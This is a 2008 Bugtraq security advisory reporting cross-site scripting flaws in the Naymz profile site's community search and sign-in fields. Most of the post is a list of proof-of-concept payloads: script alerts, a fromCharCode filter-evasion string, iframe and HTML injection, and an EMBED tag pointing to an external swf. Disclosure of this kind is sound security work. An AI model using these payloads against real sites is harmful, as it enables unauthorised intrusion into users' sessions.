[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Naymz multiple XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Naymz multiple XSS
- From: morin.josh@xxxxxxxxx
- Date: 11 Jan 2008 17:11:32 -0000
Naymz is a online profile system with positive and accurate information that
you want others to find when they search for you online.
Community Search fails to sanitize:
1."><script>alert('xss')</script>
2.';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
3."><iframe>
4.<html><font color="Red"><b>Pwned</b></font></html>
5.'';!--"<XSS>=&{()}
Existing User sign-In fails to sanitize:
1.<html><font color="black"><b>Pwned</b></font></html>
2.<EMBED SRC="http://site.com/xss.swf"
Discovered by: Joshua Morin